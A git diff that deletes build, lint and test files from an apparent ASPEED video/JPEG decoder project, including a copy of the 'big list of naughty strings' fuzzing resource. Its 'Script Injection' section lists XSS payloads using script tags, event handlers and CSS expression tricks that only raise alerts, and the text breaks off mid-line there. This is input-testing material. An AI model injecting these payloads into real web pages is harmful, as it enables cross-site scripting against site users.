diff options
-rw-r--r-- | JenkinsFile | 19 | ||||
-rwxr-xr-x | scripts/run_clang_tidy.py | 218 | ||||
-rw-r--r-- | src/ast_jpeg_decoder_test.cpp | 170 | ||||
-rw-r--r-- | src/ast_video_puller_test.cpp | 58 | ||||
-rw-r--r-- | src/test_resources/aspeedblackscreen.bin | bin | 27660 -> 0 bytes | |||
-rw-r--r-- | src/test_resources/aspeedbluescreen.bin | bin | 29500 -> 0 bytes | |||
-rw-r--r-- | src/test_resources/blns | 685 | ||||
-rw-r--r-- | src/test_resources/ubuntu_444_800x600_0chrom_0lum.bin | bin | 31648 -> 0 bytes | |||
-rw-r--r-- | static/highlight.pack.js | 2 |
9 files changed, 0 insertions, 1152 deletions
diff --git a/JenkinsFile b/JenkinsFile deleted file mode 100644 index 00e6649c7e..0000000000 --- a/JenkinsFile +++ /dev/null @@ -1,19 +0,0 @@ -#!groovy -stage 'Debug Build' -sh '''rm -rf build_debug - meson build_debug --buildtype=debug - ninja -C build_debug''' - -//stage 'Debug Test' -//sh '''cd build_debug -// ctest -V --output-on-failure''' - -stage 'Release Build' -sh '''rm -rf build_release - meson build_release --buildtype=release - ninja -C build_release''' - -//stage 'Release Test' -//sh '''cd build_release -// ctest -V --output-on-failure''' - diff --git a/scripts/run_clang_tidy.py b/scripts/run_clang_tidy.py deleted file mode 100755 index c42463b7f4..0000000000 --- a/scripts/run_clang_tidy.py +++ /dev/null @@ -1,218 +0,0 @@ -#!/usr/bin/env python3 -# -# ===- run-clang-tidy.py - Parallel clang-tidy runner ---------*- python -*--===# -# -# The LLVM Compiler Infrastructure -# -# This file is distributed under the University of Illinois Open Source -# License. See LICENSE.TXT for details. -# -# ===------------------------------------------------------------------------===# -# FIXME: Integrate with clang-tidy-diff.py - -""" -Parallel clang-tidy runner -========================== - -Runs clang-tidy over all files in a compilation database. Requires clang-tidy -and clang-apply-replacements in $PATH. - -Example invocations. -- Run clang-tidy on all files in the current working directory with a default - set of checks and show warnings in the cpp files and all project headers. - run-clang-tidy.py $PWD - -- Fix all header guards. - run-clang-tidy.py -fix -checks=-*,llvm-header-guard - -- Fix all header guards included from clang-tidy and header guards - for clang-tidy headers. - run-clang-tidy.py -fix -checks=-*,llvm-header-guard extra/clang-tidy \ - -header-filter=extra/clang-tidy - -Compilation database setup: -http://clang.llvm.org/docs/HowToSetupToolingForLLVM.html -""" - -import argparse -import json -import multiprocessing -import os -import queue -import re -import shutil -import subprocess -import sys -import tempfile -import threading - - -def find_compilation_database(path): - """Adjusts the directory until a compilation database is found.""" - result = './' - while not os.path.isfile(os.path.join(result, path)): - if os.path.realpath(result) == '/': - print('Error: could not find compilation database.') - sys.exit(1) - result += '../' - return os.path.realpath(result) - - -def get_tidy_invocation(f, clang_tidy_binary, checks, tmpdir, build_path, - header_filter, extra_arg, extra_arg_before, quiet): - """Gets a command line for clang-tidy.""" - start = [clang_tidy_binary] - if header_filter is not None: - start.append('-header-filter=' + header_filter) - else: - # Show warnings in all in-project headers by default. - start.append('-header-filter=^' + build_path + '/.*') - if checks: - start.append('-checks=' + checks) - if tmpdir is not None: - start.append('-export-fixes') - # Get a temporary file. We immediately close the handle so clang-tidy can - # overwrite it. - (handle, name) = tempfile.mkstemp(suffix='.yaml', dir=tmpdir) - os.close(handle) - start.append(name) - for arg in extra_arg: - start.append('-extra-arg=%s' % arg) - for arg in extra_arg_before: - start.append('-extra-arg-before=%s' % arg) - start.append('-p=' + build_path) - if quiet: - start.append('-quiet') - start.append(f) - return start - - -def apply_fixes(args, tmpdir): - """Calls clang-apply-fixes on a given directory. Deletes the dir when done.""" - invocation = [args.clang_apply_replacements_binary] - if args.format: - invocation.append('-format') - invocation.append(tmpdir) - subprocess.call(invocation) - shutil.rmtree(tmpdir) - - -def run_tidy(args, tmpdir, build_path, this_queue): - """Takes filenames out of queue and runs clang-tidy on them.""" - while True: - name = this_queue.get() - invocation = get_tidy_invocation( - name, args.clang_tidy_binary, args.checks, - tmpdir, build_path, args.header_filter, - args.extra_arg, args.extra_arg_before, - args.quiet) - sys.stdout.write(' '.join(invocation) + '\n') - subprocess.call(invocation) - this_queue.task_done() - - -def main(): - parser = argparse.ArgumentParser(description='Runs clang-tidy over all files ' - 'in a compilation database. Requires ' - 'clang-tidy and clang-apply-replacements in ' - '$PATH.') - parser.add_argument('-clang-tidy-binary', metavar='PATH', - default='clang-tidy', - help='path to clang-tidy binary') - parser.add_argument('-clang-apply-replacements-binary', metavar='PATH', - default='clang-apply-replacements', - help='path to clang-apply-replacements binary') - parser.add_argument('-checks', default=None, - help='checks filter, when not specified, use clang-tidy ' - 'default') - parser.add_argument('-header-filter', default=None, - help='regular expression matching the names of the ' - 'headers to output diagnostics from. Diagnostics from ' - 'the main file of each translation unit are always ' - 'displayed.') - parser.add_argument('-j', type=int, default=0, - help='number of tidy instances to be run in parallel.') - parser.add_argument('files', nargs='*', default=['.*'], - help='files to be processed (regex on path)') - parser.add_argument('-fix', action='store_true', help='apply fix-its') - parser.add_argument('-format', action='store_true', help='Reformat code ' - 'after applying fixes') - parser.add_argument('-p', dest='build_path', - help='Path used to read a compile command database.') - parser.add_argument('-extra-arg', dest='extra_arg', - action='append', default=[], - help='Additional argument to append to the compiler ' - 'command line.') - parser.add_argument('-extra-arg-before', dest='extra_arg_before', - action='append', default=[], - help='Additional argument to prepend to the compiler ' - 'command line.') - parser.add_argument('-quiet', action='store_true', - help='Run clang-tidy in quiet mode') - args = parser.parse_args() - - db_path = 'compile_commands.json' - - if args.build_path is not None: - build_path = args.build_path - else: - # Find our database - build_path = find_compilation_database(db_path) - - try: - invocation = [args.clang_tidy_binary, '-list-checks'] - invocation.append('-p=' + build_path) - if args.checks: - invocation.append('-checks=' + args.checks) - invocation.append('-') - print(subprocess.check_output(invocation)) - except: - print("Unable to run clang-tidy.", file=sys.stderr) - sys.exit(1) - - # Load the database and extract all files. - database = json.load(open(os.path.join(build_path, db_path))) - files = [entry['file'] for entry in database] - - max_task = args.j - if max_task == 0: - max_task = multiprocessing.cpu_count() - - tmpdir = None - if args.fix: - tmpdir = tempfile.mkdtemp() - - # Build up a big regexy filter from all command line arguments. - file_name_re = re.compile('|'.join(args.files)) - - try: - # Spin up a bunch of tidy-launching threads. - this_queue = queue.Queue(max_task) - for _ in range(max_task): - t = threading.Thread(target=run_tidy, - args=(args, tmpdir, build_path, this_queue)) - t.daemon = True - t.start() - - # Fill the queue with files. - for name in files: - if file_name_re.search(name): - this_queue.put(name) - - # Wait for all threads to be done. - this_queue.join() - - except KeyboardInterrupt: - # This is a sad hack. Unfortunately subprocess goes - # bonkers with ctrl-c and we start forking merrily. - print('\nCtrl-C detected, goodbye.') - if args.fix: - shutil.rmtree(tmpdir) - os.kill(0, 9) - - if args.fix: - print('Applying fixes ...') - apply_fixes(args, tmpdir) - -if __name__ == '__main__': - main() diff --git a/src/ast_jpeg_decoder_test.cpp b/src/ast_jpeg_decoder_test.cpp deleted file mode 100644 index 7491f5a2fb..0000000000 --- a/src/ast_jpeg_decoder_test.cpp +++ /dev/null @@ -1,170 +0,0 @@ -#include "ast_jpeg_decoder.hpp" - -#include <gmock/gmock.h> -#include <gtest/gtest.h> - -#ifdef BUILD_CIMG -#define cimg_display 0 -#include <CImg.h> -#endif - -using namespace testing; -MATCHER_P2(IsBetween, a, b, - std::string(negation ? "isn't" : "is") + " between " + - PrintToString(a) + " and " + PrintToString(b)) -{ - return a <= arg && arg <= b; -}; - -TEST(AstJpegDecoder, AllBlue) -{ - ast_video::RawVideoBuffer out; - - // This binary blog was created on the aspeed hardware using a blue screen - // consisting of the color 0x8EFFFA in a web browser window - FILE* fp = fopen("test_resources/aspeedbluescreen.bin", "rb"); - EXPECT_NE(fp, nullptr); - size_t bufferlen = - fread(out.buffer.data(), sizeof(decltype(out.buffer)::value_type), - out.buffer.size(), fp); - fclose(fp); - - ASSERT_GT(bufferlen, 0); - - out.ySelector = 0; - out.uvSelector = 0; - out.mode = ast_video::YuvMode::YUV444; - out.width = 800; - out.height = 600; - - ast_video::AstJpegDecoder d; - d.decode(out.buffer, out.width, out.height, out.mode, out.ySelector, - out.uvSelector); - - int tolerance = 16; - - // All pixels should be blue (0x8EFFFA) to within a tolerance (due to jpeg - // compression artifacts and quanitization) - for (int i = 0; i < out.width * out.height; i++) - { - ast_video::RGB& pixel = d.outBuffer[i]; - EXPECT_GT(pixel.r, 0x8E - tolerance); - EXPECT_LT(pixel.r, 0x8E + tolerance); - EXPECT_GT(pixel.g, 0xFF - tolerance); - EXPECT_LT(pixel.g, 0xFF + tolerance); - EXPECT_GT(pixel.b, 0xF1 - tolerance); - EXPECT_LT(pixel.b, 0xF1 + tolerance); - } -} - -TEST(AstJpegDecoder, AllBlack) -{ - ast_video::RawVideoBuffer out; - - // This binary blog was created on the aspeed hardware using a black screen - FILE* fp = fopen("test_resources/aspeedblackscreen.bin", "rb"); - EXPECT_NE(fp, nullptr); - size_t bufferlen = fread(out.buffer.data(), sizeof(char), - out.buffer.size() * sizeof(long), fp); - fclose(fp); - - ASSERT_GT(bufferlen, 0); - - out.ySelector = 0; - out.uvSelector = 0; - out.mode = ast_video::YuvMode::YUV444; - out.width = 800; - out.height = 600; - - ast_video::AstJpegDecoder d; - d.decode(out.buffer, out.width, out.height, out.mode, out.ySelector, - out.uvSelector); - - // All pixels should be blue (0x8EFFFA) to within a tolerance (due to jpeg - // compression artifacts and quanitization) - for (int x = 0; x < out.width; x++) - { - for (int y = 0; y < out.height; y++) - { - ast_video::RGB pixel = d.outBuffer[x + (y * out.width)]; - ASSERT_EQ(pixel.r, 0x00) << "X:" << x << " Y: " << y; - ASSERT_EQ(pixel.g, 0x00) << "X:" << x << " Y: " << y; - ASSERT_EQ(pixel.b, 0x00) << "X:" << x << " Y: " << y; - } - } -} - -TEST(AstJpegDecoder, TestColors) -{ - ast_video::RawVideoBuffer out; - - // This binary blog was created on the aspeed hardware using a blue screen - // consisting of the color 0x8EFFFA in a web browser window - FILE* fp = fopen("test_resources/ubuntu_444_800x600_0chrom_0lum.bin", "rb"); - EXPECT_NE(fp, nullptr); - size_t bufferlen = fread(out.buffer.data(), sizeof(char), - out.buffer.size() * sizeof(long), fp); - fclose(fp); - - ASSERT_GT(bufferlen, 0); - - out.ySelector = 0; - out.uvSelector = 0; - out.mode = ast_video::YuvMode::YUV444; - out.width = 800; - out.height = 600; - - ast_video::AstJpegDecoder d; - d.decode(out.buffer, out.width, out.height, out.mode, out.ySelector, - out.uvSelector); - - int tolerance = 16; - /* - for (int i = 0; i < out.width * out.height; i++) { - ast_video::RGB &pixel = d.outBuffer[i]; - EXPECT_GT(pixel.r, 0x8E - tolerance); - EXPECT_LT(pixel.r, 0x8E + tolerance); - EXPECT_GT(pixel.g, 0xFF - tolerance); - EXPECT_LT(pixel.g, 0xFF + tolerance); - EXPECT_GT(pixel.b, 0xF1 - tolerance); - EXPECT_LT(pixel.b, 0xF1 + tolerance); - } - */ -} - -// Tests the buffers around the screen aren't written to -TEST(AstJpegDecoder, BufferLimits) -{ - ast_video::RawVideoBuffer out; - - // This binary blog was created on the aspeed hardware using a black screen - FILE* fp = fopen("test_resources/aspeedblackscreen.bin", "rb"); - EXPECT_NE(fp, nullptr); - size_t bufferlen = fread(out.buffer.data(), sizeof(char), - out.buffer.size() * sizeof(long), fp); - fclose(fp); - - ASSERT_GT(bufferlen, 0); - - out.ySelector = 0; - out.uvSelector = 0; - out.mode = ast_video::YuvMode::YUV444; - out.width = 800; - out.height = 600; - - ast_video::AstJpegDecoder d; - d.decode(out.buffer, out.width, out.height, out.mode, out.ySelector, - out.uvSelector); - // reserved pixel should be default value - for (auto& pixel : d.outBuffer) - { - EXPECT_EQ(pixel.reserved, 0xAA); - } - // All pixels beyond the buffer should be zero - for (int i = out.width * out.height; i < d.outBuffer.size(); i++) - { - EXPECT_EQ(d.outBuffer[i].r, 0x00) << "index:" << i; - EXPECT_EQ(d.outBuffer[i].b, 0x00) << "index:" << i; - EXPECT_EQ(d.outBuffer[i].g, 0x00) << "index:" << i; - } -}
\ No newline at end of file diff --git a/src/ast_video_puller_test.cpp b/src/ast_video_puller_test.cpp deleted file mode 100644 index a69f47b72b..0000000000 --- a/src/ast_video_puller_test.cpp +++ /dev/null @@ -1,58 +0,0 @@ -#include <fcntl.h> -#include <stdio.h> -#include <stdlib.h> -#include <unistd.h> - -#include <ast_jpeg_decoder.hpp> -#include <ast_video_puller.hpp> - -#include <chrono> -#include <fstream> -#include <iomanip> -#include <iostream> -#include <thread> -#include <vector> - -#include <gmock/gmock.h> -#include <gtest/gtest.h> - -TEST(AstvideoPuller, BasicRead) -{ - ast_video::RawVideoBuffer out; - bool have_hardware = false; - if (access("/dev/video", F_OK) != -1) - { - ast_video::SimpleVideoPuller p; - p.initialize(); - out = p.readVideo(); - } - else - { - FILE* fp = - fopen("test_resources/ubuntu_444_800x600_0chrom_0lum.bin", "rb"); - if (fp) - { - size_t newLen = fread(out.buffer.data(), sizeof(char), - out.buffer.size() * sizeof(long), fp); - if (ferror(fp) != 0) - { - fputs("Error reading file", stderr); - } - fclose(fp); - out.buffer.resize(newLen); - out.mode = ast_video::YuvMode::YUV444; - out.width = 800; - out.height = 600; - out.ySelector = 0; - out.uvSelector = 0; - } - } - - FILE* fp = fopen("/tmp/screendata.bin", "wb"); - fwrite(out.buffer.data(), sizeof(char), out.buffer.size(), fp); - fclose(fp); - - ast_video::AstJpegDecoder d; - d.decode(out.buffer, out.width, out.height, out.mode, out.ySelector, - out.uvSelector); -} diff --git a/src/test_resources/aspeedblackscreen.bin b/src/test_resources/aspeedblackscreen.bin Binary files differdeleted file mode 100644 index 537216dc34..0000000000 --- a/src/test_resources/aspeedblackscreen.bin +++ /dev/null diff --git a/src/test_resources/aspeedbluescreen.bin b/src/test_resources/aspeedbluescreen.bin Binary files differdeleted file mode 100644 index 829c674ef6..0000000000 --- a/src/test_resources/aspeedbluescreen.bin +++ /dev/null diff --git a/src/test_resources/blns b/src/test_resources/blns deleted file mode 100644 index cdbac02377..0000000000 --- a/src/test_resources/blns +++ /dev/null @@ -1,685 +0,0 @@ -# sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt - -# Reserved Strings -# -# Strings which may be used elsewhere in code - -undefined -undef -null -NULL -(null) -nil -NIL -true -false -True -False -TRUE -FALSE -None -hasOwnProperty -\ -\\ - -# Numeric Strings -# -# Strings which can be interpreted as numeric - -0 -1 -1.00 -$1.00 -1/2 -1E2 -1E02 -1E+02 --1 --1.00 --$1.00 --1/2 --1E2 --1E02 --1E+02 -1/0 -0/0 --2147483648/-1 --9223372036854775808/-1 --0 --0.0 -+0 -+0.0 -0.00 -0..0 -. -0.0.0 -0,00 -0,,0 -, -0,0,0 -0.0/0 -1.0/0.0 -0.0/0.0 -1,0/0,0 -0,0/0,0 ---1 -- --. --, -999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 -NaN -Infinity --Infinity -INF -1#INF --1#IND -1#QNAN -1#SNAN -1#IND -0x0 -0xffffffff -0xffffffffffffffff -0xabad1dea -123456789012345678901234567890123456789 -1,000.00 -1 000.00 -1'000.00 -1,000,000.00 -1 000 000.00 -1'000'000.00 -1.000,00 -1 000,00 -1'000,00 -1.000.000,00 -1 000 000,00 -1'000'000,00 -01000 -08 -09 -2.2250738585072011e-308 - -# Special Characters -# -# ASCII punctuation. All of these characters may need to be escaped in some -# contexts. Divided into three groups based on (US-layout) keyboard position. - -,./;'[]\-= -<>?:"{}|_+ -!@#$%^&*()`~ - -# Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, -# and U+007F (DEL) -# Often forbidden to appear in various text-based file formats (e.g. XML), -# or reused for internal delimiters on the theory that they should never -# appear in input. -# The next line may appear to be blank or mojibake in some viewers. - - -# Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. -# Commonly misinterpreted as additional graphic characters. -# The next line may appear to be blank, mojibake, or dingbats in some viewers. - - -# Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode -# version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), -# and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often -# treated as whitespace in some contexts. -# This file unfortunately cannot express strings containing -# U+0000, U+000A, or U+000D (NUL, LF, CR). -# The next line may appear to be blank or mojibake in some viewers. -# The next line may be flagged for "trailing whitespace" in some viewers. -
- -# Unicode additional control characters: all of the characters with -# general category Cf (in Unicode 8.0.0). -# The next line may appear to be blank or mojibake in some viewers. - - -# "Byte order marks", U+FEFF and U+FFFE, each on its own line. -# The next two lines may appear to be blank or mojibake in some viewers. - - - -# Unicode Symbols -# -# Strings which contain common unicode symbols (e.g. smart quotes) - -Ω≈ç√∫˜µ≤≥÷ -åß∂ƒ©˙∆˚¬…æ -œ∑´®†¥¨ˆøπ“‘ -¡™£¢∞§¶•ªº–≠ -¸˛Ç◊ı˜Â¯˘¿ -ÅÍÎÏ˝ÓÔÒÚÆ☃ -Œ„´‰ˇÁ¨ˆØ∏”’ -`⁄€‹›fifl‡°·‚—± -⅛⅜⅝⅞ -ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя -٠١٢٣٤٥٦٧٨٩ - -# Unicode Subscript/Superscript/Accents -# -# Strings which contain unicode subscripts/superscripts; can cause rendering issues - -⁰⁴⁵ -₀₁₂ -⁰⁴⁵₀₁₂ -ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ - -# Quotation Marks -# -# Strings which contain misplaced quotation marks; can cause encoding errors - -' -" -'' -"" -'"' -"''''"'" -"'"'"''''" -<foo val=“bar” /> -<foo val=“bar” /> -<foo val=”bar“ /> -<foo val=`bar' /> - -# Two-Byte Characters -# -# Strings which contain two-byte characters: can cause rendering issues or character-length issues - -田中さんにあげて下さい -パーティーへ行かないか -和製漢語 -部落格 -사회과학원 어학연구소 -찦차를 타고 온 펲시맨과 쑛다리 똠방각하 -社會科學院語學研究所 -울란바토르 -𠜎𠜱𠝹𠱓𠱸𠲖𠳏 - -# Changing length when lowercased -# -# Characters which increase in length (2 to 3 bytes) when lowercased -# Credit: https://twitter.com/jifa/status/625776454479970304 - -Ⱥ -Ⱦ - -# Japanese Emoticons -# -# Strings which consists of Japanese-style emoticons which are popular on the web - -ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ -(。◕ ∀ ◕。) -`ィ(´∀`∩ -__ロ(,_,*) -・( ̄∀ ̄)・:*: -゚・✿ヾ╲(。◕‿◕。)╱✿・゚ -,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ -(╯°□°)╯︵ ┻━┻) -(ノಥ益ಥ)ノ ┻━┻ -┬─┬ノ( º _ ºノ) -( ͡° ͜ʖ ͡°) - -# Emoji -# -# Strings which contain Emoji; should be the same behavior as two-byte characters, but not always - -😍 -👩🏽 -👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 -🐵 🙈 🙉 🙊 -❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 -✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 -🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 -0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 - -# Regional Indicator Symbols -# -# Regional Indicator Symbols can be displayed differently across -# fonts, and have a number of special behaviors - -🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸 -🇺🇸🇷🇺🇸🇦🇫🇦🇲 -🇺🇸🇷🇺🇸🇦 - -# Unicode Numbers -# -# Strings which contain unicode numbers; if the code is localized, it should see the input as numeric - -123 -١٢٣ - -# Right-To-Left Strings -# -# Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) - -ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. -בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ -הָיְתָהtestالصفحات التّحول -﷽ -ﷺ -مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، - -# Trick Unicode -# -# Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) - -test -test -
test
-testtest -test - -# Zalgo Text -# -# Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) - -Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ -̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ -̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ -̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ -Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ - -# Unicode Upsidedown -# -# Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com) - -˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ -00˙Ɩ$- - -# Unicode font -# -# Strings which contain bold/italic/etc. versions of normal characters - -The quick brown fox jumps over the lazy dog -𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠 -𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌 -𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈 -𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰 -𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘 -𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐 -⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢ - -# Script Injection -# -# Strings which attempt to invoke a benign script injection; shows vulnerability to XSS - -<script>alert(123)</script> -<script>alert('123');</script> -<img src=x onerror=alert(123) /> -<svg><script>123<1>alert(123)</script> -"><script>alert(123)</script> -'><script>alert(123)</script> -><script>alert(123)</script> -</script><script>alert(123)</script> -< / script >< script >alert(123)< / script > - onfocus=JaVaSCript:alert(123) autofocus -" onfocus=JaVaSCript:alert(123) autofocus -' onfocus=JaVaSCript:alert(123) autofocus -<script>alert(123)</script> -<sc<script>ript>alert(123)</sc</script>ript> ---><script>alert(123)</script> -";alert(123);t=" -';alert(123);t=' -JavaSCript:alert(123) -;alert(123); -src=JaVaSCript:prompt(132) -"><script>alert(123);</script x=" -'><script>alert(123);</script x=' -><script>alert(123);</script x= -" autofocus onkeyup="javascript:alert(123) -' autofocus onkeyup='javascript:alert(123) -<script\x20type="text/javascript">javascript:alert(1);</script> -<script\x3Etype="text/javascript">javascript:alert(1);</script> -<script\x0Dtype="text/javascript">javascript:alert(1);</script> -<script\x09type="text/javascript">javascript:alert(1);</script> -<script\x0Ctype="text/javascript">javascript:alert(1);</script> -<script\x2Ftype="text/javascript">javascript:alert(1);</script> -<script\x0Atype="text/javascript">javascript:alert(1);</script> -'`"><\x3Cscript>javascript:alert(1)</script> -'`"><\x00script>javascript:alert(1)</script> -ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF -ABC<div style="x:expression\x5C(javascript:alert(1)">DEF -ABC<div style="x:expression\x00(javascript:alert(1)">DEF -ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF -ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF -ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF -ABC<div style="x:\x09expression(javascript:alert(1)">DEF -ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF -ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF -ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF -ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF -ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF -ABC<div style="x:\x20expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF -ABC<div style="x:\x00expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF -ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF -ABC<div 